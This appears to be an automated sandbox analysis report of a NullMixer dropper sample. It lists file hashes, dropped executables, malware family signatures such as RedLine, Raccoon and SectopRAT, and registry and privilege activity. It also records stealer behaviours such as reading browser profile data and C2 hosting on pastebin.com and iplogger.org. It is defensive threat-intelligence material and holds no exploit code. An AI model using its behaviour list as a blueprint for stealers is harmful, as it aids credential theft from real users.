SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2804-61-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/300-191-0x0000000000400000-0x0000000000422000-memory.dmp

memory/300-182-0x0000000000400000-0x0000000000422000-memory.dmp

memory/300-194-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2632-195-0x0000000002A00000-0x0000000002AA7000-memory.dmp

memory/300-192-0x0000000000400000-0x0000000000422000-memory.dmp

memory/300-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2632-197-0x0000000002AB0000-0x0000000002B44000-memory.dmp

memory/2632-199-0x0000000002AB0000-0x0000000002B44000-memory.dmp

memory/2632-196-0x0000000002AB0000-0x0000000002B44000-memory.dmp

memory/300-188-0x0000000000400000-0x0000000000422000-memory.dmp

memory/300-186-0x0000000000400000-0x0000000000422000-memory.dmp

memory/300-184-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2804-208-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2804-207-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2804-206-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2804-204-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2804-201-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2804-200-0x0000000000400000-0x000000000051C000-memory.dmp

memory/980-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/980-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/980-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/980-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/980-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/980-213-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1644-223-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1612-224-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2876-222-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/980-211-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2632-226-0x00000000009F0000-0x0000000000B4D000-memory.dmp

memory/2632-233-0x0000000002AB0000-0x0000000002B44000-memory.dmp

memory/2632-235-0x0000000000800000-0x000000000088D000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331646796819" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
